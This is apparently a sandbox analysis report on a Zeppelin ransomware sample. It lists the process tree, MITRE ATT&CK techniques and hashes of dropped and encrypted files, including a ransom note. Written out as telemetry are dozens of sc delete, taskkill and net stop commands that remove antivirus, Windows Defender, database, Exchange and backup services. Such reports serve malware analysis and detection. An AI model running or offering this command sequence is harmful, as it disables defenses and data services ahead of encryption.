- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL"
    3⤵
    PID:1372
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent"
    3⤵
    - Launches sc.exe
    PID:3008
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLServerADHelper100"
    3⤵
    PID:2340
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLServerOLAPService"
    3⤵
    PID:1348
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MsDtsServer100"
    3⤵
    PID:1392
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ReportServer"
    3⤵
    - Launches sc.exe
    PID:1940
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLTELEMETRY$HL"
    3⤵
    PID:1328
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TMBMServer"
    3⤵
    PID:2272
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL$PROGID"
    3⤵
    PID:2776
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL$WOLTERSKLUWER"
    3⤵
    PID:2652
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent$PROGID"
    3⤵
    - Launches sc.exe
    PID:1592
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent$WOLTERSKLUWER"
    3⤵
    PID:2248
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLFDLauncher$OPTIMA"
    3⤵
    PID:2016
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL$OPTIMA"
    3⤵
    PID:2692
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent$OPTIMA"
    3⤵
    - Launches sc.exe
    PID:2300
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ReportServer$OPTIMA"
    3⤵
    - Launches sc.exe
    PID:1896
- - C:\Windows\SysWOW64\sc.exe
    sc delete "msftesql$SQLEXPRESS"
    3⤵
    PID:2680
- - C:\Windows\SysWOW64\sc.exe
    sc delete "postgresql-x64-9.4"
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\sc.exe
    sc delete "WRSVC"
    3⤵
    - Launches sc.exe
    PID:3016
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ekrn"
    3⤵
    PID:3024
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ekrnEpsw"
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klim6"
    3⤵
    PID:1280
- - C:\Windows\SysWOW64\sc.exe
    sc delete "AVP18.0.0"
    3⤵
    PID:2980
- - C:\Windows\SysWOW64\sc.exe
    sc delete "KLIF"
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klpd"
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klflt"
    3⤵
    PID:2968
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klbackupdisk"
    3⤵
    PID:1612
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klbackupflt"
    3⤵
    PID:2360
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klkbdflt"
    3⤵
    PID:1364
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klmouflt"
    3⤵
    PID:2888
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klhk"
    3⤵
    PID:484
- - C:\Windows\SysWOW64\sc.exe
    sc delete "KSDE1.0.0"
    3⤵
    - Launches sc.exe
    PID:1040
- - C:\Windows\SysWOW64\sc.exe
    sc delete "kltap"
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ScSecSvc"
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Core Mail Protection"
    3⤵
    - Launches sc.exe
    PID:272
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Core Scanning Server"
    3⤵
    PID:2480
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Core Scanning ServerEx"
    3⤵
    PID:1724
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Online Protection System"
    3⤵
    PID:2320
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Core Browsing Protection"
    3⤵
    PID:1012
- - C:\Windows\SysWOW64\sc.exe
    sc delete "RepairService"
    3⤵
    PID:2312
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Quick Update Service"
    3⤵
    - Launches sc.exe
    PID:1036
- - C:\Windows\SysWOW64\sc.exe
    sc delete "McAfeeFramework"
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\sc.exe
    sc delete "macmnsvc"
    3⤵
    - Launches sc.exe
    PID:2308
- - C:\Windows\SysWOW64\sc.exe
    sc delete "masvc"
    3⤵
    - Launches sc.exe
    PID:2884
- - C:\Windows\SysWOW64\sc.exe
    sc delete "mfemms"
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\sc.exe
    sc delete "mfevtp"
    3⤵
    - Launches sc.exe
    PID:2008
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmFilter"
    3⤵
    - Launches sc.exe
    PID:2188
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TMLWCSService"
    3⤵
    - Launches sc.exe
    PID:1928
- - C:\Windows\SysWOW64\sc.exe
    sc delete "tmusa"
    3⤵
    - Launches sc.exe
    PID:280
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmPreFilter"
    3⤵
    - Launches sc.exe
    PID:2832
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TMSmartRelayService"
    3⤵
    PID:2112
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TMiCRCScanService"
    3⤵
    PID:1684
- - C:\Windows\SysWOW64\sc.exe
    sc delete "VSApiNt"
    3⤵
    - Launches sc.exe
    PID:1468
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmCCSF"
    3⤵
    PID:3016
- - C:\Windows\SysWOW64\sc.exe
    sc delete "tmlisten"
    3⤵
    - Launches sc.exe
    PID:1732
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmProxy"
    3⤵
    - Launches sc.exe
    PID:820
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ntrtscan"
    3⤵
    - Launches sc.exe
    PID:304
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ofcservice"
    3⤵
    - Launches sc.exe
    PID:2480
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmPfw"
    3⤵
    PID:620
- - C:\Windows\SysWOW64\sc.exe
    sc delete "PccNTUpd"
    3⤵
    PID:740
- - C:\Windows\SysWOW64\sc.exe
    sc delete "PandaAetherAgent"
    3⤵
    PID:1080
- - C:\Windows\SysWOW64\sc.exe
    sc delete "PSUAService"
    3⤵
    PID:2836
- - C:\Windows\SysWOW64\sc.exe
    sc delete "NanoServiceMain"
    3⤵
    - Launches sc.exe
    PID:2088
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPIntegrationService"
    3⤵
    PID:2220
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPProtectedService"
    3⤵
    - Launches sc.exe
    PID:2380
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPRedline"
    3⤵
    PID:2924
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPSecurityService"
    3⤵
    PID:2148
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPUpdateService"
    3⤵
    PID:1092
- - C:\Windows\SysWOW64\sc.exe
    sc delete "UniFi"
    3⤵
    PID:1860
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im PccNTMon.exe
    3⤵
    - Kills process with taskkill
    PID:1692
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im NTRtScan.exe
    3⤵
    - Kills process with taskkill
    PID:1740
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TmListen.exe
    3⤵
    - Kills process with taskkill
    PID:1012
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TmCCSF.exe
    3⤵
    - Kills process with taskkill
    PID:3048
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TmProxy.exe
    3⤵
    - Kills process with taskkill
    PID:3020
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TMBMSRV.exe
    3⤵
    - Kills process with taskkill
    PID:1108
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TMBMSRV.exe
    3⤵
    - Kills process with taskkill
    PID:1752
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TmPfw.exe
    3⤵
    - Kills process with taskkill
    PID:2276
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im CNTAoSMgr.exe
    3⤵
    - Kills process with taskkill
    PID:1796
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlbrowser.exe
    3⤵
    - Kills process with taskkill
    PID:2856
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlwriter.exe
    3⤵
    - Kills process with taskkill
    PID:2692
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlservr.exe
    3⤵
    - Kills process with taskkill
    PID:1720
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im msmdsrv.exe
    3⤵
    - Kills process with taskkill
    PID:2776
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im MsDtsSrvr.exe
    3⤵
    - Kills process with taskkill
    PID:1076
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlceip.exe
    3⤵
    - Kills process with taskkill
    PID:3020
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im fdlauncher.exe
    3⤵
    - Kills process with taskkill
    PID:1304
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im Ssms.exe
    3⤵
    - Kills process with taskkill
    PID:1244
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im SQLAGENT.EXE
    3⤵
    - Kills process with taskkill
    PID:340
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im fdhost.exe
    3⤵
    - Kills process with taskkill
    PID:1956
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im fdlauncher.exe
    3⤵
    - Kills process with taskkill
    PID:2368
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlservr.exe
    3⤵
    - Kills process with taskkill
    PID:612
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im ReportingServicesService.exe
    3⤵
    - Kills process with taskkill
    PID:1988
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im msftesql.exe
    3⤵
    - Kills process with taskkill
    PID:1540
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im pg_ctl.exe
    3⤵
    - Kills process with taskkill
    PID:3028
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im postgres.exe
    3⤵
    - Kills process with taskkill
    PID:2056
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLServerADHelper100
    3⤵
    PID:1552
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper100
      4⤵
      PID:1272
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$ISARS
    3⤵
    PID:760
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$ISARS
      4⤵
      PID:1624
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$MSFW
    3⤵
    PID:2360
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$MSFW
      4⤵
      PID:1364
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$ISARS
    3⤵
    PID:2756
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$ISARS
      4⤵
      PID:1896
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$MSFW
    3⤵
    PID:1624
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$MSFW
      4⤵
      PID:2444
- - C:\Windows\SysWOW64\net.exe
    net stop SQLBrowser
    3⤵
    PID:300
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLBrowser
      4⤵
      PID:2292
- - C:\Windows\SysWOW64\net.exe
    net stop ReportServer$ISARS
    3⤵
    PID:3044
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer$ISARS
      4⤵
      PID:1608
- - C:\Windows\SysWOW64\net.exe
    net stop SQLWriter
    3⤵
    PID:2704
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLWriter
      4⤵
      PID:524
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    PID:2392
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      PID:2248
- - C:\Windows\SysWOW64\net.exe
    net stop mr2kserv
    3⤵
    PID:2068
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop mr2kserv
      4⤵
      PID:3016
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeADTopology
    3⤵
    PID:2988
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeADTopology
      4⤵
      PID:2832
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeFBA
    3⤵
    PID:1456
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeFBA
      4⤵
      PID:2940
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeIS
    3⤵
    PID:2736
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeIS
      4⤵
      PID:2960
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeSA
    3⤵
    PID:2476
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSA
      4⤵
      PID:1964
- - C:\Windows\SysWOW64\net.exe
    net stop ShadowProtectSvc
    3⤵
    PID:2056
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ShadowProtectSvc
      4⤵
      PID:2816
- - C:\Windows\SysWOW64\net.exe
    net stop SPAdminV4
    3⤵
    PID:1272
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPAdminV4
      4⤵
      PID:996
- - C:\Windows\SysWOW64\net.exe
    net stop SPTimerV4
    3⤵
    PID:888
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPTimerV4
      4⤵
      PID:1896
- - C:\Windows\SysWOW64\net.exe
    net stop SPTraceV4
    3⤵
    PID:2608
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPTraceV4
      4⤵
      PID:820
- - C:\Windows\SysWOW64\net.exe
    net stop SPUserCodeV4
    3⤵
    PID:1364
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPUserCodeV4
      4⤵
      PID:1300
- - C:\Windows\SysWOW64\net.exe
    net stop SPWriterV4
    3⤵
    PID:2100
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPWriterV4
      4⤵
      PID:1796
- - C:\Windows\SysWOW64\net.exe
    net stop SPSearch4
    3⤵
    PID:1756
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPSearch4
      4⤵
      PID:560
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLServerADHelper100
    3⤵
    PID:2016
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper100
      4⤵
      PID:1628
- - C:\Windows\SysWOW64\net.exe
    net stop IISADMIN
    3⤵
    PID:2256
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop IISADMIN
      4⤵
      PID:2264
- - C:\Windows\SysWOW64\net.exe
    net stop firebirdguardiandefaultinstance
    3⤵
    PID:2960
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop firebirdguardiandefaultinstance
      4⤵
      PID:2340
- - C:\Windows\SysWOW64\net.exe
    net stop ibmiasrw
    3⤵
    PID:1688
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ibmiasrw
      4⤵
      PID:1392
- - C:\Windows\SysWOW64\net.exe
    net stop QBCFMonitorService
    3⤵
    PID:3052
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBCFMonitorService
      4⤵
      PID:1328
- - C:\Windows\SysWOW64\net.exe
    net stop QBVSS
    3⤵
    PID:2008
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBVSS
      4⤵
      PID:1804
- - C:\Windows\SysWOW64\net.exe
    net stop QBPOSDBServiceV12
    3⤵
    PID:2712
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBPOSDBServiceV12
      4⤵
      PID:1752
- - C:\Windows\SysWOW64\net.exe
    net stop "IBM Domino Server (CProgramFilesIBMDominodata)"
    3⤵
    PID:2756
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "IBM Domino Server (CProgramFilesIBMDominodata)"
      4⤵
      PID:1484
- - C:\Windows\SysWOW64\net.exe
    net stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
    3⤵
    PID:2668
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
      4⤵
      PID:936
- - C:\Windows\SysWOW64\net.exe
    net stop IISADMIN
    3⤵
    PID:1992
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop IISADMIN
      4⤵
      PID:272
- - C:\Windows\SysWOW64\net.exe
    net stop "Simply Accounting Database Connection Manager"
    3⤵
    PID:2620
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "Simply Accounting Database Connection Manager"
      4⤵
      PID:820
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB1
    3⤵
    PID:2608
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB1
      4⤵
      PID:2244
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB2
    3⤵
    PID:1952
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB2
      4⤵
      PID:2276
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB3
    3⤵
    PID:2520
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB3
      4⤵
      PID:1120
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB4
    3⤵
    PID:1552
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB4
      4⤵
      PID:1980
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB5
    3⤵
    PID:560
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB5
      4⤵
      PID:2124
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq MsMpEng.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:2856
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:2248
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq ntrtscan.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:2188
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:2744
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq avp.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:1032
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:2668
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq WRSA.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:2260
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:2068
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq egui.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:2724
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq AvastUI.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:2372
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:2348
- C:\Users\Admin\AppData\Local\Temp\3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
  "C:\Users\Admin\AppData\Local\Temp\3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe" -agent 0
  2⤵
  - Drops file in Program Files directory
  PID:2852
- C:\Users\Admin\AppData\Local\Temp\3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
  "C:\Users\Admin\AppData\Local\Temp\3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe" -agent 1
  2⤵
  PID:2916
- C:\Windows\SysWOW64\notepad.exe
  notepad.exe
  2⤵
  - Deletes itself
  PID:1048

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2424

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.lng

Filesize
23KB

MD5
208aebb1d5c059a64a700f17bd06823d

SHA1
6e7ea2a47cdab661ff07e97f298d7baaa253fe67

SHA256
2e3350451653aa0700c23812b4567ef14d9f794b472f2ca3113c5fc55154fd9e

SHA512
d551f68bbdf86b8911b9f3f00c639d6224433b180d2b09179ab4bb1687a9e60341b0eef2c3e21afa60059c48930f6a2b56ae9fc585579a50df48174d3be73d87

Download Submit
C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt

Filesize
29KB

MD5
d0b96a28666bf4404b6e54eafc2fe63d

SHA1
0c044630842f4df310a41c610a38f1bad25dd2f2

SHA256
da391257d359dfe9066d6bfc0eefb6eb1e1de44b4d9008a581fbad703ee848a0

SHA512
66c5702a148941837ce9b877805cfe6518f7e8d15fc7ad45640db9faf6dc7ee82e0d1a24200a31fdb3a4b41b11343ca4e0f6abf9b6c285108f5f89535c375eaf

Download Submit
C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca

Filesize
6KB

MD5
092ff2a505bcb57e1cd6661f0327a8dd

SHA1
2360be0bde75ede7c4ea7295fc9776f3673f9b5c

SHA256
cf55ad5fee90b017fa994a9648461934835c14e2499e016106e48d4fc3d7e381

SHA512
1ba606b5e3658b2fb5f0d0c5ddf322e58e7a0c9d418c6eea469cd71ca7cc838e9df4025c04d33b2628bbb7e80f102656170142be00f7745459f45921c9a07591

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME39.CSS

Filesize
122KB

MD5
3727bcf06eadd5aa8688506dd96b0bd9

SHA1
9e731b8077cb1bf18b084799fdf3ef97a51f7b19

SHA256
241e07cfa4d54a91350d160635b8a914e87718c7f8a1cd60c541cb454b2a5d81

SHA512
8dd4cb8417edcca42cce37b97e9507c0406d4b8a23dc9f0fb675e69b38e21a1ba7b914b3a5d4b027fa54d0fa89cbb4c630a5f0076b0f9b64e21c9a3b3bc0df6a

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME54.CSS

Filesize
125KB

MD5
4fe1dbdfcd50a8ddc13fe67560551935

SHA1
6b819bf125da128ac6450f464be56b3c902c15a3

SHA256
e0590c94a8173be61078b5ec8de4206b17528f262b3335e795146bd697e51fb9

SHA512
db39409a125412314ba249b3e4e2c1b3f775df9d730fc3e9ff498872606112fbeca202d9ae99d376b8058b2095c0923b3bb65ffb5c2d3024dc73a9cde84c8216

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\ISO690.XSL

Filesize
258KB

MD5
f69bc8bc6958db7869a8a89d3f1ff07e

SHA1
d41a878b41a858f84d201a8a90d1bc84d714be4e

SHA256
902f8eb812efde031018aba9389101e123a01194409021f3131c5aab26ae2576

SHA512
2753c6d4c55262c0572c801df9f94a3e0c3a7f2c94b4c4370d251d290c1b26d4b715233048652c4ebd03bb300aa83a03e8c87f5a5860b3a15aefae9210500a0e

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\TURABIAN.XSL

Filesize
332KB

MD5
cd25a22ed1b36b911cbfb9ecb2eadad0

SHA1
4aa2dc0c94c870aa2a30956048a82b575bc3fe48

SHA256
a450bd2732b4ed4ede8c3e1168a2760737fcfa5d60347306243bf75db7bda781

SHA512
9d6edd264d4159117878d900f12e212969717b7d1f81ba3b1c9ef6ba7cb5ad59f5e9021c505b0bf5a3d6c8434cf2d661cf34940321963a5732092317ac9ed40b

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\EXLIRMV.XML.1F5-33B-521

Filesize
78KB

MD5
63e656ab50e94cfcfcb54172be59824f

SHA1
e6b324083d7c5e95c4af0433477aa721752de96d

SHA256
714a1ed4eae7b290e38fd6c0eb54c482396a3fcca309723c98a94571ae717843

SHA512
435aff5e96d62f3fd492a4e7d63b685199c6fc8d26fabe9a4841c0337c62ded1b349d8742ec3b0e813e7681f4a1c6204d5a7aa297a225d06cbf4cd3c489f4669

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImages.jpg

Filesize
7KB

MD5
1269c3d7f3e4934499a73cc8ecc20619

SHA1
a64332b007cd9a39faf11df2d423c4e5840f50ad

SHA256
74090a7ba45d7994a50aaf868c55f0598c11a598fce69cde0502f05e2c3fed5f

SHA512
6c4692de374994ea152168c0377f7673ad647299b6c0a5595eb4c8254207c3e5e5fe970bdf6fec5c47412c5ce4708030549a83178323e22ac72cea8f74940554

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\IPIRMV.XML

Filesize
78KB

MD5
9ae5f43712d5829f2757c5b97f782747

SHA1
dbe700b42a0f4ed0a42af09424a7d75263dcbee7

SHA256
e8c31c85fe55243464c71a20b1860e1398852647d9261c28ae1422f79022a9be

SHA512
100e45a16baca9ee29f8eb26e11c86dec8fe258c799f527b594de18e142b819a9a46a87c6e5d0bd2d650cdb7270d7bf0e39d263265e88703f86d656820ff4388

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\Microsoft.Office.InfoPath.xml

Filesize
249KB

MD5
4d7fafe3d23d28aae5a419c685f71ca8

SHA1
af2fb4b0b82cee546ade6a66b293ee0debb16764

SHA256
d8d51e76ed94663fc2ceddc13868a38f69533549073121d247184bae4d29c43c

SHA512
c30f60a559caa1ad8bb3fa578b64312cc250a16cd5e3e870df813e7bba2b9e4b4e0032b7bca1f01900669c2efaae602b53cb70aefc864d28b0e2edbaf1f654a4

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\OLKIRMV.XML

Filesize
78KB

MD5
4bf5afdbf65bef95475804a9ac6dfade

SHA1
29cec06d9995a9215d9604bc33529f1f7980b6b3

SHA256
39463a004ba3ec64807c8ad68e318bb5efb5a6619d6677f3cbdc13d8e8e34306

SHA512
0b7c5ead0046f35fd6a972d17fddb3d836ad052c4d5d7ebe26c5ceced4181d230db5a69e7fdf6733f79fc276945bd7e2878c6a9a00d858ac3ca1883cc3a0f092

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\PPTIRMV.XML

Filesize
78KB

MD5
26b76215583a42492f60393970cf7155

SHA1
ac2a891a17019a7471b8f9181978ad831232c618

SHA256
f3d69e84afefe2535ce64a578f46363ef79d2432b70ade44e426f667cbdce78f

SHA512
9a1b05b95990703b22685a255d1618b337270af08b4b3f7d824ae1a72c3d795c024fe2c9d69b5c22144709ae423d2f1f979ec1752769c9a6bd9c62963b21de74

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\WORDIRMV.XML

Filesize
78KB

MD5
60139604c3e477da57201654e2c6665a

SHA1
956c546e4e4a795ca3d319930f824a8fe039123e

SHA256
fb45afeb6e09dee7a678116397ceebeab3c3ae12b2a53e2bc29e5a2d474bcc8e

SHA512
3b652986107faa07a255a8d993e7e5da6076d37cb6725d0721aedb4546f22ab7fca9befe2303a134e6b1a565abaf3f032938391d095e4deb4a3ad3dca659a60f

Download Submit
C:\Program Files\Java\jdk1.7.0_80\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT

Filesize
1KB

MD5
2f0b27c62eb3e64fc1ee55ebeb78ef62

SHA1
690c911f85f6751796bbaf5d864784722d659d81

SHA256
2cac54920605657ecbf2730cbddbdbf1149b40407c809d85ceb8bd4f5da9814f

SHA512
ffca63c9101d1b3ac5a655dcf98220f562d57f1a80221a8044f1afd648b7c4a278530c611b365b3b5b9b6cfcb3595817b1f8665b0d674f2a20bd2d96369e6ffe

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.properties

Filesize
7KB

MD5
12fcea090da7e9e09d66d3e03cf9510e

SHA1
290f645d4b3dd39752480aa73a8a53420b278e7d

SHA256
16e913c3c28d710400dc0b37ad8f588e047c01f4fc74ae59db01589e94718076

